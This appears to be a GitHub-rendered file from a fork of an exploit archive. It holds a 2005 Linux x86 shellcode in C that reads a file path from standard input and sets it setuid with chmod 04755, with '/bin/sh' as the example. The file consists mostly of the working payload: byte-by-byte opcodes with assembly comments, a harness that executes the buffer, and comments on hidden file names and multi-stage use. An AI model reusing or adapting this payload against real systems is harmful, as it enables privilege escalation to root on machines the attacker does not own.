forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy path13406.c
More file actions
executable file
·39 lines (37 loc) · 1.39 KB
/
Copy path13406.c
File metadata and controls
executable file
·39 lines (37 loc) · 1.39 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
/* readnchmod-core.c by Charles Stevenson <core@bokeoa.com>
*
* Example of strace output if you pass in "/bin/sh\x00"
* read(0, "/bin/sh\0", 2541) = 8
* chmod("/bin/sh", 04755) = 0
*
* Any file path can be given. For example: /tmp/.sneakyguy
* The only caveat is that the string must be NULL terminated.
* This shouldn't be a problem. For multi-stage payloads send
* in this first and then you can send it data with null bytes.
* I made this for rare cases with tight space contraints and
* where read() jmp *%esp is not practical.
*
*/
char hellcode[] = /* read(0,buf,2541); chmod(buf,4755); linux/x86 by core */
"\x31\xdb"// xor %ebx,%ebx
"\xf7\xe3"// mul %ebx
"\x53"// push %ebx
"\xb6\x09"// mov $0x9,%dh
"\xb2\xed"// mov $0xed,%dl
"\x89\xe1"// mov %esp,%ecx
"\xb0\x03"// mov $0x3,%al
"\xcd\x80"// int $0x80
"\x89\xd1"// mov %edx,%ecx
"\x89\xe3"// mov %esp,%ebx
"\xb0\x0f"// mov $0xf,%al
"\xcd\x80"// int $0x80
;
int main(void)
{
void (*shell)() = (void *)&hellcode;
printf("%d byte read(0,buf,2541); chmod(buf,4755); linux/x86 by core\n",
strlen(hellcode));
shell();
return 0;
}
// milw0rm.com [2005-11-09]